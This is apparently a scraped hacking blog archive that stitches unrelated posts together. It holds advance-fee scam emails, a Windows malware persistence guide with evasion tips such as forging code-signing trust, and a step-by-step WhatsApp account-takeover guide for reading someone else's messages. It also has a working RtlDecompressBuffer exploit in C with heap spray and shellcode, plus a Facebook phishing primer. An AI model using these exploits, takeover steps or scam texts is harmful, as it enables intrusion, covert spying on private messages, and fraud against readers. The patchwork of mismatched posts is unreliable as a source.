Tuesday, April 28, 2020

FROM W.H.O COVID-19

Greeting
Have a good day!
I am Johnson Lennox from Airfreight Diplomatic Delivery Company. I have a cheque from The World Health Organization, It's unfortunate we tried delivering your cheque to your address yesterday but delivery attempt failed due to wrong address input in the system. Reply Back to Schedule another delivery. Thank You!!
Best Regards,
Johnson Lennox
Posted by at No comments:

Sunday, April 26, 2020

Many Ways Of Malware Persistence (That You Were Always Afraid To Ask)

TL;DR: Are you into red teaming? Need persistence? This post is not that long, read it ;)
Are you into blue teaming? Have to find those pesky backdoors? This post is not that long, read it ;)

In the previous post, I listed different ways how a Windows domain/forest can be backdoored. In this new post, I am digging a bit deeper, and list the most common/known ways malware can survive a reboot, just using local resources of the infected Windows system. The list is far from complete, and I would like to encourage everyone to comment on new methods, not yet listed here.

From an incident response point of view, one of the best strategies to find malware on a suspicious system is to search for suspicious entries that start with the system. In the good old days, you had to check for 2-3 locations to cover 99% of the infections. Nowadays, there are a thousand ways malware can start. The common ones automatically start whenever Windows starts (or the user logs in), but some tricky ones are triggered by other events.

Autoruns

My favorite choice when it comes to malware persistence is Sysinternals tools, Autoruns. In this paragraph, I mainly quote the official built-in help, but bear with me, it is still interesting.

On a side note, there are some problems with the Autoruns tool: it can only run on a live system. (EDIT: This is not true, Autoruns can analyze offline systems as well! Thanks to a comment from Justin.) And usually, this is not the case - I usually have dd images. And although VBoxManage can convert the dd images to VirtualBox disk image format, usually I don't have the time and storage to do that. This is where xmount awesomeness is here to rescue the day. It can convert dd and Encase images on-the-fly in-memory to Virtualbox format. Just attach the disk image to a new Virtualbox machine as the main boot HDD, modify the CPU/disk/controller settings until Windows starts instead of crashing, and voila, you can boot your forensic image - without modifying a single bit on the original evidence dd file. Another problem with malware analysis on a live system is that a good rootkit can fool the analyst easily. 

For quick wins, I usually filter out Microsoft entries, look for per-user locations only and check for unverified (missing or invalid Authenticode) executables. This usually helps to find 90% of malware easily. Especially if it has a color like purple or pink, it is highly suspicious. To find the rest, well, one has to dig deeper.
Zeus "hiding" in the usual random directory - check the faked timestamp
To implement "poor-mans monitoring", regularly save the output of Autoruns, and during incident response, it will be highly valuable. Howto guide here.

Logon

"This entry results in scans of standard autostart locations such as the Startup folder for the current user and all users, the Run Registry keys, and standard application launch locations." 
There are 42 registry keys/folders at the moment in Autoruns, which can be used to autostart a malware. The most common ways are the HKCU\Software\Microsoft\Windows\CurrentVersion\Run and the C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup folder.
One of my favorite regarding this topic is the file-less Poweliks malware, 100% pure awesomeness. Typical ring 3 code execution.

Explorer

"Select this entry to see Explorer shell extensions, browser helper objects, explorer toolbars, active setup executions, and shell execute hooks". 71 registry keys, OMG. Usually, this is not about auto-malware execution, but some of them might be a good place to hide malware.

Internet explorer

"This entry shows Browser Helper Objects (BHO's), Internet Explorer toolbars and extensions". 13 registry key here. If a malicious BHO is installed into your browser, you are pretty much screwed.

Scheduled tasks

"Task scheduler tasks configured to start at boot or logon." Not commonly used, but it is important to look at this.
I always thought this part of the autostart entries is quite boring, but nowadays, I think it is one of the best ways to hide your malware. There are so many entries here by default, and some of them can use quite good tricks to trigger the start.
Did you know that you can create custom events that trigger on Windows event logs?
Did you know you can create malware persistence just by using Windows tools like bitsadmin and Scheduled tasks?
Scheduler in the old days
Scheduler in the new days

Services

HKLM\System\CurrentControlSet\Services is a very commonplace to hide malware, especially rootkits. Check all entries with special care.

Drivers

Same as services. Very commonplace for rootkits. Unfortunately, signing a driver for 64-bit systems is not fun anymore, as it has to be signed by certificates that can be chained back to "Software Publisher Certificates". Typical startup place for Ring 0 rootkits. 
Starting from Windows 10, even this will change and all drivers have to be signed by "Windows Hardware Developer Center Dashboard portal" and EV certificates.

Codecs

22 registry keys. Not very common, but possible code execution.

Boot execute

"Native images (as opposed to Windows images) that run early during the boot process."
5 registry keys here. Good place to hide a rootkit here.

Image hijacks

"Image file execution options and command prompt autostarts." 13 registry key here. I believe this was supposed for debugging purposes originally.
This is where the good-old sticky keys trick is hiding. It is a bit different from the others, as it provides a backdoor access, but you can only use this from the local network (usually). The trick is to execute your code whenever someone presses the SHIFT key multiple times before logging into RDP. The old way was to replace the sethc.exe, the new fun is to set a debug program on sethc.
If you see this, you are in trouble

AppInit

"This has Autoruns shows DLLs registered as application initialization DLLs." Only 3 registry keys here. This is the good old way to inject a malicious DLL into Explorer, browsers, etc. Luckily it is going to be deprecated soon.

Known DLLs

"This reports the location of DLLs that Windows loads into applications that reference them." Only 1 registry key. This might be used to hijack some system DLLs.

Winlogon

"Shows DLLs that register for Winlogon notification of logon events." 7 registry keys. Sometimes used by malware.

Winsock providers

"Shows registered Winsock protocols, including Winsock service providers. Malware often installs itself as a Winsock service provider because there are few tools that can remove them. Autoruns can disable them, but cannot delete them." 4 registry keys. AFAIK this was trendy a while ago. But still, a good place to hide malware.

Print monitors

"Displays DLLs that load into the print spooling service. Malware has used this support to autostart itself." 1 registry key. Some malware writers are quite creative when it comes to hiding their persistence module.

LSA providers

"Shows registers Local Security Authority (LSA) authentication, notification and security packages." 5 registry keys. A good place to hide your password stealer.

Network providers

"Missing documentation". If you have a good 1 sentence documentation, please comment.

WMI filters

"Missing documentation". Check Mandiant for details.

Sidebar gadgets

Thank god MS disabled this a while ago :)
We all miss you, you crappy resource gobble nightmares

Common ways - not in autoruns

Now, let's see other possibilities to start your malware, which won't be listed in Sysinternals Autoruns.

Backdoor an executable/DLL

Just change the code of an executable which is either auto-starting or commonly started by the user. To avoid lame mistakes, disable the update of the file ... The backdoor factory is a good source for this task. But if you backdoor an executable/DLL which is already in Autoruns listed, you will break the Digital Signature on the file. It is recommended to sign your executable, and if you can't afford to steal a trusted certificate, you can still import your own CA into the user's trusted certificate store (with user privileges), and it will look like a trusted one. Protip: Use "Microsoft Windows" as the codesigner CA, and your executable will blend in.
See, rootkit.exe totally looks legit, and it is filtered out when someone filters for "Hide Windows entries".


Hijack DLL load order

Just place your DLL into a directory which is searched before the original DLL is found, and PROFIT! But again, to avoid lame detection, be sure to proxy the legitimate function calls to the original DLL. A good source on this topic from Mandiant and DLL hijack detector.


Here you can see how PlugX works in action, by dropping a legitimate Kaspersky executable, and hijacking the DLL calls with their DLL. 

Hijack a shortcut from the desktop/start menu

Never underestimate the power of lame tricks. Just create an executable which calls the original executable, and meanwhile starts your backdoor. Replace the link, PROFIT! And don't be a skiddie, check the icon ;) I have seen this trick in adware hijacking browsers a lot of times.

IE hijacked to start with http://tinyurl.com/2fcpre6

File association hijack

Choose the user's favorite file type, replace the program which handles the opening with a similar one described in the previous section, and voila!

COM object hijack

The main idea is that some COM objects are scanned for whether they are on the system or not, and when it is registered, it is automatically loaded. See COMpfun for details.

Windows Application Compatibility - SHIM

Not many people are familiar with Windows Application Compatibility and how it works. Think about it as an added layer between applications and the OS. If the application matches a certain condition (e.g. filename), certain actions will take place. E.g. emulation of directories, registry entries, DLL injection, etc. In my installation, there are 367 different compatibility fixes (type of compatibility "simulation"), and some of those can be customized.
Every time IE starts, inject a DLL into IE

Bootkits 

Although bootkits shown here can end up in Autoruns in the drivers section (as they might need a driver at the end of the day), I still think it deserves a different section.

MBR - Master boot record

Malware can overwrite the Master boot record, start the boot process with its own code, and continue the boot process with the original one. It is common for rootkits to fake the content of the MBR record, and show the original contents. Which means one just have attached the infected HDD to a clean system, and compare the first 512 bytes (or more in some cases) with a known, clean state, or compare it to the contents shown from the infected OS. SecureBoot can be used to prevent malware infections like this.
There is a slight difference when MBR is viewed from infected OS vs clean OS

VBR - Volume boot record

This is the next logical step where malware can start it's process, and some malware/rootkit prefers to hide it's startup code here. Check GrayFish for details. SecureBoot can be used to prevent malware infections like this.

BIOS/UEFI malware

Both the old BIOS and the new UEFI can be modified in a way that malware starts even before the OS had a chance to run. Although UEFI was meant to be more secure than BIOS, implementation and design errors happens. Check the Computrace anti-theft rootkit for details.

Hypervisor - Ring -1 rootkit

This is somewhat special, because I believe although rootkit can run in this layer but it can't persist only in this layer on an average, physical machine, because it won't survive a reboot See Rutkowska's presentation from 2006 But because the hypervisor can intercept the restart event, it can write itself into one of the other layers (e.g. install a common kernel driver), and simply delete it after it is fully functional after reboot. Update: There is a good paper from Igor Korkin about hypervisor detection here.

SMM (System Management Mode) malware - Ring -2 rootkit

Somehow related to the previous type of attacks, but not many people know that System Management Mode can be used to inject code into the OS. Check the DEITYBOUNCE malware for more details ;) Also, abusing Intel Dual Monitor Mode (DMM) can lead to untrusted code execution, which basically monitors the SMM mode.

Intel® Active Management Technology - Ring -3 rootkit

According to Wikipedia, "Intel Active Management Technology (AMT) is hardware and firmware technology for remote out-of-band management of personal computers, in order to monitor, maintain, update, upgrade, and repair them". You can ask, what could possibly go wrong? See Alexander Tereshkin's and Rafal Wojtczuk's great research on this, or Vassilios Ververis thesis about AMT
As not many people click on links, let me quote the scary stuff about AMT:
  • Independent of the main CPU
  • Can access host memory via DMA (with restrictions)
  • Dedicated link to NIC, and its filtering capabilities
  • Can force host OS to reboot at any time (and boot the system from the emulated CDROM)
  • Active even in S3 sleep!

Other stuff

Create new user, update existing user, hidden admins

Sometimes one does not even have to add malicious code to the system, as valid user credentials are more than enough. Either existing users can be used for this purpose, or new ones can be created. E.g. a good trick is to use the Support account with a 500 RID - see here, Metasploit tool here.

Esoteric firmware malware

Almost any component in the computer runs with firmware, and by replacing the firmware with a malicious one, it is possible to start the malware. E.g. HDD firmware (see GrayFish again), graphic card, etc.

Hidden boot device

Malware can hide in one of the boot devices which are checked before the average OS is loaded, and after the malware is loaded, it can load the victim OS.

Network-level backdoor

Think about the following scenario: every time the OS boots, it loads additional data from the network. It can check for new software updates, configuration updates, etc. Whenever a vulnerable software/configuration update, the malware injects itself into the response, and get's executed. I know, this level of persistence is not foolproof, but still, possible. Think about the recently discovered GPO MiTM attack, the Evilgrade tool, or even the Xensploit tool when we are talking about VM migration.

Software vulnerability

Almost any kind of software vulnerability can be used as a persistent backdoor. Especially, if the vulnerability can be accessed remotely via the network, without any user interaction. Good old MS08-067...

Hardware malware, built into the chipset

I am not sure what to write here. Ask your local spy agency for further information. Good luck finding those!

More links

Tools I highly recommend:
For more information, check this blog post, part 1, part 2

Update 2017-04-29: A very nice list of Office persistence: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/

Update 2017-10-23: Persistence via Security Descriptors and ACLs: https://www.youtube.com/watch?v=SeR4QJbaNRg

Update 2018-07-25: Backdooring LAPS https://rastamouse.me/2018/03/laps---part-1/
https://rastamouse.me/2018/03/laps---part-2/ 

I would like to thank to Gabor Pek from CrySyS Lab for reviewing and completing this post.

More articles


Posted by at No comments:

Saturday, April 25, 2020

hello dear.

Hello friend,

I have a business proposal that I want to share with you, it is lucrative and it is going to benefit you and me. And I do need you to advise me on your position.
Please contact me via email address: (safiya@scurelmail.com) for more informationa.

Yours sincerely,
Mrs.Safiya Qadhafi.
Posted by at No comments:

CEH: 10 Hacking Tools For Hackers


There are a lot of hacking tools available over the internet but mostly we need some of them. In this blog you'll learn about hacking tools which are typically used in the world of hacking by penetration testers.

SmartWhois

SmartWhois is an information-gathering program that allows you to find all available information about an IP address, hostname, or domain, including country, state or province, city, name of the network provider, administrator, and technical support contact information. SmartWhois is a graphical version of the basic Whois program.

SocksChain

SocksChain is a tool that gives a hacker the ability to attack through a chain of proxy servers. The main purpose of doing this is to hide the hacker's real IP address and therefore minimize the chance of detection. When a hacker works through several proxy servers in series, it's much harder to locate the hacker. Tracking the attacker's IP address through the logs of several proxy servers is complex and tedious work. If one of the proxy servers' log files is lost or incomplete, the chain is broken, and the hacker's IP address remains anonymous.

NeoTrace, VisualRoute, and VisualLookout

NeoTrace, VisualRoute, and VisualLookout are all packet-tracking tools with a GUI or visual interface. They plot the path the packets travel on a map and can visually identify the locations of routers and other internet working devices. These tools operate similarly to traceroute and perform the same information gathering; however, they provide a visual representation of the results.

Visualware's eMailTrackerPro

Visualware's eMailTrackerPro ( www.emailtrackerpro.com/ ) and MailTracking ( http://mailtracking.com/ ) are tools that allow an ethical hacker to track email messages. When you use these tools to send an email, forward an email, reply to an email, or modify an email, the resulting actions and tracks of the original email are logged. The sender is notified of all actions performed on the tracked email by an automatically generated email.

IPEye

IPEye is a TCP port scanner that can do SYN, FIN, Null, and XMAS scans. It's a command line tool.
IPEye probes the ports on a target system and responds with closed, reject, drop, or open. Closed means there is a computer on the other end, but it doesn't listen at the port. Reject means a firewall is rejecting the connection to the port (sending a reset back). Drop means a firewall is dropping everything to the port, or there is no computer on the other end. Open means some kind of service is listening at the port. These responses help a hacker identify what type of system is responding.

IPSecScan

IPSecScan is a tool that can scan either a single IP address or a range of addresses looking for systems that are IPSec enabled that means the system has IPSec enabled while disabled means that it either has IPSec disabled, the compatibility issue or the configuration issue that not reveal to you that it has IPSec enabled. Indeterminable means that the scanner isn't sure if IPSec is enabled or disabled.

Icmpenum

Icmpenum uses not only ICMP Echo packets to probe networks, but also ICMP Timestamp and ICMP Information packets. Furthermore, it supports spoofing and sniffing for reply packets. Icmpenum is great for scanning networks when the firewall blocks ICMP Echo packets but fails to block Timestamp or Information packets.

SNMP Scanner

SNMP Scanner allows you to scan a range or list of hosts performing ping, DNS, and Simple Network Management Protocol (SNMP) queries. This tool helps you to find out the current information about the device of SNMP nodes in the given network.

hping2 tool

The hping2 tool is notable because it contains a host of other features besides OS fingerprinting such as TCP, User Datagram Protocol (UDP), ICMP, and raw-IP ping protocols, traceroute mode, and the ability to send files between the source and target system.

THC-Scan, PhoneSweep, and TeleSweep

THC-Scan, PhoneSweep, and TeleSweep are tools that identify phone numbers and can dial a target to make a connection with a computer modem. These tools generally work by using a predetermined list of common usernames and passwords in an attempt to gain access to the system. Most remote-access dial-in connections aren't secured with a password or use very rudimentary security.

Related news


Posted by at No comments:

How To Hack Any Whatsapp Account In 2020

The article will also be broken down into different subtopics and subcategories. This to make it easy for those who are just interested in skimming through the article to pick the part of WhatsApp hack they are most interested in. Just incase you don't have enough time to go through the entire article.

Search queries like these are a common place; Can WhatsApp be hacked? Can you read WhatsApp messages? How safe is the most popular trade fair in the world? This article gives you all the solution you need to hack any WhatsApp account, as well as how to protect yourself from a WhatsApp hack attack.

Although the messenger is now on an end-to-end encryption, WhatsApp is still not totally safe from espionage. WhatsApp chats and messages can still be accessed and read remotely, and old &deleted WhatsApp chats and messages retrieved.

WhatsApp Spy: Hack WhatsApp Chats and Messages

A very simple solution is to use a software that can hack WhatsApp remotely. All manufacturers offer to read the WhatsApp messages an extra web portal. In addition to the Whatsapp messages but can also spy on other messengers. So you can also have access to social media accounts.

The software may only be installed on a smartphone. If the user of the smartphone has been informed about the installation and effects.

WhatsApp Hacker: 3 Steps to Hack WhatsApp in 2020

You can hack Whatsapp using a second cell phone. No extra SIM card is necessary for this. The guide also works with a tablet. With this method, the other phone only needs to clone WhatsApp messages is internet connection.

The trick to hack Whatsapp successfully is not a software bug. It's the way WhatsApp has developed the setup wizard. Since there are no user accounts with passwords and you log in via the mobile number, here lies the vulnerability. But you can also protect yourself from the Whatsapp hack.

Hack WhatsApp Chat with the Best WhatsApp Hacking Tool

To read Whatsapp messages, the mobile phone number of the target must be known. The cell phone can remain locked. There is no need to install software to hack and read Whatsapp messages. Even with the PIN or fingerprint, the Whatsapp account can be hacked.

STEP 1: Create a New WhatsApp Account

To hack an account from Whatsapp, the app from the App Store must be installed on the second cell phone. After the installation of Whatsapp, target's phone number is entered. A confirmation request must be waited until access to the smartphone of the victim exists.

STEP 2: WhatsApp Account Confirmation

The confirmation of the Whatsapp account is the actual security risk of the messenger. Whatsapp usually confirms the registration via SMS. Occasionally the confirmation will also be sent by automated phone call via a phone call.

Calls and text messages can be read and taken by anyone even when the screen is locked. So that the WhatsApp hack does not stand out, the SMS must be removed from the start screen by swiping.

STEP 3: Enter Confirmation

The stolen verification PIN is now entered on the second smartphone. As a result, the WhatsApp account has been taken over by you. You can read the WhatsApp messages, which respond to this mobile phone number.

The downside to this trick is that the victim immediately notices the Whatsapp hack as soon as Whatsapp is opened. If the victim goes through the sign-in process again. The attacker loses access to the messages and no Whatsapp messages can be read.

How to Hack Someone's WhatsApp in 2020

A good way to hack a WhatsApp account is to hack whatsapp online. Here you can read WhatsApp messages via a browser and also write. The target user can continue to use his cell phone (works for iOS, Android phone etc) and does not notice the WhatsApp hack.

STEP 1: Access the Cell Phone

In order to be able to read WhatsApp messages by installing software. Access to the unlocked smartphone is required for a short time. In addition, cell phone, a computer or laptop is necessary. On this the Whatsapp messages will be read later.

STEP 2: Access WhatsApp Web

If you have access to the unlocked smartphone, Whatsapp must be started there. The Whatsapp settings include Whatsapp Web . If this is selected, Whatsapp opens a QR code scanner with the hint to open WhatsApp Web in the browser.

If the QR code is scanned in the browser with the smartphone. There is a permanent connection and Whatsapp messages can be read. If you want to hack Whatsapp in this way. You have full access to all incoming messages and you can even write messages yourself.

STEP 3: Read WhatsApp Messages

The target usually sees this Whatsapp hack only when the settings are invoked to Whatsapp Web in the app. Whatsapp messages can be read via the browser. Regardless of whether the smartphone is on home Wi-Fi or on the move. You can also hack group chats admin by just having any of the contact details.

WhatsApp Hack: How to Hack any WhatsApp account

Which is the most popular messaging app globally? Of course, you can use different apps from Android or iOS to send and receive messages. But Whatsapp remains everyone's favorite globally!

Whatsapp is one of the popular apps in the world. There are more than 2 billion active users on Whatsapp, messaging daily with the app. Why do people love WhatsApp? Whatsapp is very convenient and easy to use.

Other messaging apps like Facebook Messenger, still needs a special account to sign up for this app. If you change a new app, you'll need to add another account. This can be stressful, as you have to remember a lot of new passwords and usernames.

HACKER NT

More info


Posted by at No comments:

HOW TO BECOME A CERTIFIED ETHICAL HACKER

7 Tips to become a hacker?
It is very important for a hacker to learn different types of programming language such as C,C++,Python,Java,PHP etc and it is also necessary to learn hardware and networking for a good hacker because these skill are very useful to become a successful hacker.

1-Programming Language are essential to becoming a good hacker 

2-Networking skills is important to becoming an effective hacker.

3-SQL language are essential to becoming an effective hacker 

4-Internet surfing is also essential for becoming a hacker for gathering information.

5-Cryptography is essential to becoming a certified hacker from which a hacker can share his/her readable data to other person in a nonreadable form with the help of Cryptography.

6-Penetration testing  is also important for a hacker.

7-experiment a lot is also very useful to becoming a ethical hacker.

Follow me on insta_anoymous_adi

Related articles


Posted by at No comments:

Friday, April 24, 2020

RtlDecompresBuffer Vulnerability

Introduction

The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.

The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.

The algorithms callback table







Notice the five nops at the end probably for adding new algorithms in the future.

The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]

The bounrady checks

We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:


int  RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6)
{
  int result; // eax@4

  if ( algorithm & algorithm != 1 )
  {
    if ( algorithm & 0xF0 )
      result = -1073741217;
    else
      result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);
  }
  else
  {
    result = -1073741811;
  }
  return result;
}

Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that  the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.



let's check the disassembly on Win7 32bits:

  • the movzx limits the boundaries to 16bits
  • the test ax, ax avoids the algorithm 0
  • the cmp ax, 1 avoids the algorithm 1
  • the test al, 0F0h limits the boundary .. wait .. al?


Let's calc the max two bytes number that bypass the test al, F0h

unsigned int max(void) {
        __asm__("xorl %eax, %eax");
        __asm__("movb $0xff, %ah");
        __asm__("movb $0xf0, %al");
}

int main(void) {
        printf("max: %u\n", max());
}

The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9? 



So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.

Proof of concept

This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.

The result on WinXP:

The result on Win7 32bits:


And the exploit code:

/*
    ntdll!RtlDecompressBuffer() vtable exploit + heap spray
    by @sha0coder

*/

#include 
#include 
#include 

#define KB  1024
#define MB  1024*KB
#define BLK_SZ 4096
#define ALLOC 200
#define MAGIC_DECOMPRESSION_AGORITHM 9

// WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php
/*
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"
"\xBF\x77\xFF\xD2\xCC"
"\xE8\xF3\xFF\xFF\xFF"
"\x63\x61\x6C\x63";
*/

// https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
char *shellcode =
       "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
       "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
       "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
       "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
       "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
       "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
       "\x45\x81\x3e\x43\x72\x65\x61\x75"
       "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
       "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
       "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
       "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
       "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
       "\x6c\x63\x89\xe2\x52\x52\x53\x53"
       "\x53\x53\x53\x53\x52\x53\xff\xd7";


PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits

void fail(const char *msg) {
  printf("%s\n\n", msg);
  exit(1);
}

PUCHAR spray(HANDLE heap) {
  PUCHAR map = 0;

  printf("Spraying ...\n");
  printf("Aproximating to %p\n", landing_ptr);

  while (map < landing_ptr-1*MB) {
    map = HeapAlloc(heap, 0, 1*MB);
  }

  //map = HeapAlloc(heap, 0, 1*MB);

  printf("Aproximated to [%x - %x]\n", map, map+1*MB);


  printf("Landing adddr: %x\n", landing_ptr);
  printf("Offset of landing adddr: %d\n", landing_ptr-map);

  return map;
}

void landing_sigtrap(int num_of_traps) {
  memset(landing_ptr, 0xcc, num_of_traps);
}

void copy_shellcode(void) {
  memcpy(landing_ptr, shellcode, strlen(shellcode));

}

int main(int argc, char **argv) {
  FARPROC RtlDecompressBuffer;
  NTSTATUS ntStat;
  HANDLE heap;
  PUCHAR compressed, uncompressed;
  ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;

  RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");

  heap = GetProcessHeap();

  compressed_sz = estimated_uncompressed_sz = 1*KB;

  compressed = HeapAlloc(heap, 0, compressed_sz);

  uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);


  spray(heap);
  copy_shellcode();
  //landing_sigtrap(1*KB);
  printf("Landing ...\n");

  ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);

  switch(ntStat) {
    case STATUS_SUCCESS:
      printf("decompression Ok!\n");
      break;

    case STATUS_INVALID_PARAMETER:
      printf("bad compression parameter\n");
      break;


    case STATUS_UNSUPPORTED_COMPRESSION:
      printf("unsuported compression\n");
      break;

    case STATUS_BAD_COMPRESSION_BUFFER:
      printf("Need more uncompressed buffer\n");
      break;

    default:
      printf("weird decompression state\n");
      break;
  }

  printf("end.\n");
}

The attack vector
This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7
More articles











Posted by



at





No comments:
  










































How are you?










Hello friend,



I have a business proposal that I want to share with you, it is lucrative and it is going to benefit you and me. And I do need you to advise me on your position.

Please contact me via email address: (safiya@scurelmail.com) for more informationa.



Yours sincerely,

Mrs.Safiya Qadhafi.









Posted by



at





No comments:
  


































          

        

          

        

Thursday, April 23, 2020


          

        










WHAT IS ETHICAL HACKING











What is ethical hacking?

Ethical hacking is identifying weakness in computer system and/or computer networks and coming with countermeasures that protect the weakness.

Ethical hackers must abide by the following rules-
1-Get written permission from the owner of the computer system and/or computer network before  hacking.
2-Protect the privacy of the organisation been hacked etc.

Ethical Hacking and Ethical Hacker are terms used to describe hacking performed by a company or individual to help identity potential threats on a computer or network.
 

An Ethical Hacker attempts to byepass system security and search for any weak point that could be exploited by Malicious Hackers.
Related word











Posted by



at





No comments:
  


































          

        

          

        

Wednesday, April 22, 2020


          

        










Hacking Facebook By Using PHP Script | Social Engineering Attack | LAN And WAN (Same Or Different Networks)












This Video is absolutely for Educational Purposes only, please don't do any illegal activity. If you do then I'm not responsible for your illegal activity. The purpose of this video is to show you How hackers can hack your social media by using their own local servers.

Basically these type of attacks  known as Social Engineering attacks or Phishing. Attacker just send the duplicate vulnerable HTML page to the victim, when victim enters any type of information to that vulnerable page it'll automatically received by the attacker.

Phishing is a form of fraud in which an attacker masquerades as a  reputable entity or person in email or other communication channels. The  attacker uses phishing emails to distribute malicious links or  attachments that can perform a variety of functions, including the  extraction of login credentials or account information from victims.

How phishing works 
Phishing attacks typically rely on social networking  techniques applied to email or other electronic communication methods,  including direct messages sent over social networks, SMS text messages  and other instant messaging modes.

Phishers may use social engineering  and other public sources of information, including social networks like  LinkedIn, Facebook and Twitter, to gather background information about  the victim's personal and work history, his interests, and his  activities.

Hacking by PHP 
As PHP is server side scripting language so first of all you have need to install a local server (WAMP, XAMPP or LAMPP) over your system. Because if there is no any server running on your system then you can't even run your PHP script. So if you wanna do a programming with PHP this is the first step to download and install a server from the Internet. You can easily download and install servers by watching my videos. Just visit my YouTube channel and watch there.









Popular Posts